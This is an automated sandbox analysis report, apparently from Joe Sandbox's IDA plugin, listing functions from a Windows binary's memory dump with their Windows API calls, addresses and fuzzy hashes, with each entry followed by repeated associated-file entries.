Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
Instruction ID: cd2a2b73cabeb24a949247a519632d2d6b68fbcf32cc92f5cf4eb7661fc727ba
Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
Instruction Fuzzy Hash: E9115E76600601DFCB24DF28D481956BBF9FF49350720C86EE88ECB662E732E841CB60

Function 00D93F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D93F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00D93F90

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00D934E2,?,00000001), ref: 00D93FCD

Part of subcall function 00D93E78: FreeLibrary.KERNEL32(00000000), ref: 00D93EAB

Part of subcall function 00D94010: _memmove.LIBCMT ref: 00D9405A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Library$Free$Load_memmove
String ID:
API String ID: 3640140200-0
Opcode ID: 7843ee29d7bd111a7fbb182fbf5725c6c484fb458f7ac9fb24992c4d0438dad1
Instruction ID: de6ad9add96a8f9c082281bf0a7ea51f6bd7f64d26822add1bef769eeadd14eb
Opcode Fuzzy Hash: 7843ee29d7bd111a7fbb182fbf5725c6c484fb458f7ac9fb24992c4d0438dad1
Instruction Fuzzy Hash: 8411CE32610309AACF14AF64DC06FAE77A9DF50704F108829F982E71C2DB709E45DB70

Function 00E0AB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00E0AB36

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 24fb0da6b002ae04b3e43363c75dc1ceaf6fb09905d0e7b2c3dd4011c628ae04
Instruction ID: d0071c55c77fea7214d938cd9a433c28f17a1cea00b2e02278b3d4b156e3c0bc
Opcode Fuzzy Hash: 24fb0da6b002ae04b3e43363c75dc1ceaf6fb09905d0e7b2c3dd4011c628ae04
Instruction Fuzzy Hash: 9E212570508701CFEB24DF28C844A1BBBE1BF8A344F194968E99657262C731E885CF62

Function 00DF10E5 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?), ref: 00DF1100

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d338f9e24ddd0f83d63cf505b3f6ae2dfafcdecf348885f2d578b2dd6de4ffe6
Instruction ID: 9151d38833e8c04b56dc7346239abc408d97eca118bf821b53963ac742ea9418
Opcode Fuzzy Hash: d338f9e24ddd0f83d63cf505b3f6ae2dfafcdecf348885f2d578b2dd6de4ffe6
Instruction Fuzzy Hash: 1C118F3A205219DFDB10CF19C8809AA77E9FF49760B06816AEE498B355CB30AD408BB1

Function 00D94CA0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00D94E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00D94CF7

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e371e11ca02bcb1023acaa4e81a7cf8b93bb1de07ac4729f6dc5cfaea08cecd2
Instruction ID: 3616cb60016a1de1aa2a334d6a565f4967164e8d1408e8916f6e646ed814d154
Opcode Fuzzy Hash: e371e11ca02bcb1023acaa4e81a7cf8b93bb1de07ac4729f6dc5cfaea08cecd2
Instruction Fuzzy Hash: 71117931202B049FDB20CF0AC880F66B7E9EF44314F14C51EE5AA86A52C7B1F846CB70

Function 00D94D29 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E045F9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
Instruction ID: 38901aea416aab1d85ef1fbff17a2698b7a4be8b6e7a691bd18f52aaa911dd63
Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
Instruction Fuzzy Hash: 19017CB9201502AFC705AB2CC991D39F7AAFF863507148159E469C7742DB30EC22CBF0

Function 00D9CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D9CB2F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
Instruction ID: 4de306f34b13478711610510c218479b82665281c9c8bbc620c3d9daf2f604ce
Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
Instruction Fuzzy Hash: ED01A972210701AED7149B79C807A67BB98DF587A0F54C92EF95ACB1D1EB71E4008BB0

Function 00DAF2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DAF307

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
Instruction ID: b51fcdba2d4c51e0988724e4dfdfcfcc9b03c5a157a53ec4a688dafb59026a9e
Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
Instruction Fuzzy Hash: 0C01D671104701EBCF21AFACD841A5BBBA8EF83360B14857EF89897291DB31E85587B5

Function 00D95116 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,00D95A39,?,?,?,-00000003,00000000,00000000), ref: 00D9514E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 1b3df8a6492659ba150dbd6d2825873318d9f73574414a7d72c68b00eb2869be
Instruction ID: 1857ea08661cfaff132a5b0430624f03a20beb52a3fef904a6ef9b7518b620d4
Opcode Fuzzy Hash: 1b3df8a6492659ba150dbd6d2825873318d9f73574414a7d72c68b00eb2869be
Instruction Fuzzy Hash: F7F0C275202B21ABCB125B15E80072AFB65EF40B61F04823AE44567654CB71D820C7F4

Function 00DE95AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00DE95C9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: f0c43777d3e5344ac0ecf1282ca9adf048b69645badfccdec0c62254c9414906
Instruction ID: 10f8a1238afc1b802979da115b3d24b47ceabcc267201a9da60ad065fbc65bb7
Opcode Fuzzy Hash: f0c43777d3e5344ac0ecf1282ca9adf048b69645badfccdec0c62254c9414906
Instruction Fuzzy Hash: 7CE0E5332042146FC710EA64DC05AABB799FF85720F04875ABDA4872C1DA30D814C3E1

Function 00D93E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,00D934E2,?,00000001), ref: 00D93E6D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b3248f9a07a819054090f5935bd276d3ddb0499dd75cfe44bca84858287088c3
Instruction ID: 90e187009e2bff48ec0de6f91b97b136c611fa7430b04da05f26853eed935ac0
Opcode Fuzzy Hash: b3248f9a07a819054090f5935bd276d3ddb0499dd75cfe44bca84858287088c3
Instruction Fuzzy Hash: EEF01571505751DFCF349FA4D894852BBE1EF047193288A6EF1D682621C7319948DF20

Function 00DD79F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00DD7A11

Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: FolderPath_memmove
String ID:
API String ID: 3334745507-0
Opcode ID: d168851889feea25d5c67b9e7aa36842521e2271554985a7d84d9e12d5a575a4
Instruction ID: e1b906033f5a9814fbb8724db5344f57969058f190b8de2ebde6c1b30a6dcd9e
Opcode Fuzzy Hash: d168851889feea25d5c67b9e7aa36842521e2271554985a7d84d9e12d5a575a4
Instruction Fuzzy Hash: 85D05EA65002282FDF50E6649C09DFB36ADC744104F0042A0786DD2042E920AE8586F0

Function 00D9193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D91952

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: e5121d37c452a9e1ed062d0c4d36bec9d911e6f1a01419656261bbe7a401caf0
Instruction ID: 8eae1a17b1816f8811a035a79612cfefd1552bb2347423130ac9034135da2374
Opcode Fuzzy Hash: e5121d37c452a9e1ed062d0c4d36bec9d911e6f1a01419656261bbe7a401caf0
Instruction Fuzzy Hash: B6D012F17942087EFB008B61CD07DFB775CD721F81F0086617E06D64D1D6649E098570

Function 00DCE390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D91952

SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DCE3AA

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$Timeout
String ID:
API String ID: 1777923405-0
Opcode ID: 9f516dac4fd1550540522c67f5b24ac7278fe6adf5386baf6f625647503b42ca
Instruction ID: 543aba84147a8a65153365cdd8aec958a247b84641ad0943dcca9ac10f3da27b
Opcode Fuzzy Hash: 9f516dac4fd1550540522c67f5b24ac7278fe6adf5386baf6f625647503b42ca
Instruction Fuzzy Hash: 44D01275144150AAFE706F15FC06FC17792DB40751F254459B581B70E9C6D25C415554

Function 00DE6FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?), ref: 00DE6FE1

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 37b426347d1dd42c90d6a7b0d1680cc40d828f6709b8161857e14a42e586139e
Instruction ID: 302feed5b532e80b13904722e3475826146f97974519ce9749e5674473794891
Opcode Fuzzy Hash: 37b426347d1dd42c90d6a7b0d1680cc40d828f6709b8161857e14a42e586139e
Instruction Fuzzy Hash: 5CD09E362146149F8B01EF99DC44C8977E9FF4D7117018451F509DB231D621FC549B90

Function 00D94FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00E049DA,?,?,00000000), ref: 00D94FC4

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d7019d62d04f829189aeacb24cef9757f63af4195b2f2aa71dbd33daaf35d770
Instruction ID: 4313125649f97736f055ac2740abb60abf1addcdc6d7ddde04f32f3756ce1703
Opcode Fuzzy Hash: d7019d62d04f829189aeacb24cef9757f63af4195b2f2aa71dbd33daaf35d770
Instruction Fuzzy Hash: 40D0C974740208BFEB00CB91DC46F9A7BBCEB04718F600194FA00A62D0D2F2BE448B55

Function 00E04DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E04DE7

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 141edab667e2346fed8005cd2e4598315863ce01eab6f08513d4692ec7c421b7
Instruction ID: 2e59441ac5ebc2d4f2ba12b9df9a8f47e597ac3c1fbcfda45805ea450386a640
Opcode Fuzzy Hash: 141edab667e2346fed8005cd2e4598315863ce01eab6f08513d4692ec7c421b7
Instruction Fuzzy Hash: 6DD0C9B1504200DBE7209F69E80478ABBE4AF95340F24C829E5D682550D7FAE8C69B22

Function 00D950EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00D950BE,?,00D95088,?,00D9BE3D,00E522E8,?,00000000,?,00D93E2E,?,00000000,?), ref: 00D9510C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1b511ba42566f85fb19c61f2b3d5db1092378bee90890f0ce97d8eb8e55d4df6
Instruction ID: bffda63074da9e7252e418343d775e121105bf0138c3b4b4634da8fb4a315bf7
Opcode Fuzzy Hash: 1b511ba42566f85fb19c61f2b3d5db1092378bee90890f0ce97d8eb8e55d4df6
Instruction Fuzzy Hash: B4E09275504B02DBC7324F1AA804452FBE5EFE13613258A2ED4E992664D7B0548A9BA0

Non-executed Functions

Function 00DFF5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00DFF64E
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DFF6AD
GetWindowLongW.USER32(?,000000F0), ref: 00DFF6EA
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DFF711
SendMessageW.USER32 ref: 00DFF737
_wcsncpy.LIBCMT ref: 00DFF7A3
